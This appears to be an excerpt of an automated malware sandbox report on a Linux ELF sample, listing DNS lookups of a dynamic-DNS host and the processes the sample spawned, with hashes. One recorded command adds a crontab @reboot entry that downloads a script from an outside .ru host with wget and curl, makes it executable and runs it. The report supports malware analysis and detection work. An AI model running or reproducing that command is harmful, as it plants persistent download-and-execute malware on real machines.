                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:15:59.914367914 CEST1.1.1.1192.168.2.150x87caNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:15:59.914367914 CEST1.1.1.1192.168.2.150x87caNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                            System Behavior

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/tmp/gmpsl.elf
                                            Arguments:/tmp/gmpsl.elf
                                            File size:5773336 bytes
                                            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/tmp/gmpsl.elf
                                            Arguments:-
                                            File size:5773336 bytes
                                            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/bin/sh
                                            Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/bin/sh
                                            Arguments:-
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/bin/sh
                                            Arguments:-
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/usr/bin/crontab
                                            Arguments:crontab -l
                                            File size:43720 bytes
                                            MD5 hash:66e521d421ac9b407699061bf21806f5

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/bin/sh
                                            Arguments:-
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/usr/bin/crontab
                                            Arguments:crontab -
                                            File size:43720 bytes
                                            MD5 hash:66e521d421ac9b407699061bf21806f5

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/tmp/gmpsl.elf
                                            Arguments:-
                                            File size:5773336 bytes
                                            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                            Start time (UTC):17:13:13
                                            Start date (UTC):26/10/2024
                                            Path:/tmp/gmpsl.elf
                                            Arguments:-
                                            File size:5773336 bytes
                                            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9